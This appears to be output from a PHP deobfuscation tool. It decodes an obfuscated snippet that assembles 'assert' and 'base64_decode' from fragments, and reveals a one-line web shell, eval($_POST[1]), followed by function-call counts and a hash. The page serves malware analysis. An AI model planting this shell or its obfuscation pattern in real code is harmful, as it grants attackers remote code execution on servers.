Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $char_as='as'; $char_e='e'; $char_assert=$char_as.'s'.$char_e.'r'.'t'..
Decoded Output download
eval($_POST[1])
Did this file decode correctly?
Original Code
<?php
$char_as='as';
$char_e='e';
$char_assert=$char_as.'s'.$char_e.'r'.'t';
$char_base64_decode='b'.$char_as.$char_e.(64).'_'.'d'.$char_e.'c'.'o'.'d'.$char_e;
@$char_assert(@$char_base64_decode('ZXZhbCgkX1BPU1RbMV0p'));
?>
Function Calls
assert | 1 |
base64_decode | 1 |
Stats
MD5 | 26bd750152483794ff741ac7eb028437 |
Eval Count | 1 |
Decode Time | 123 ms |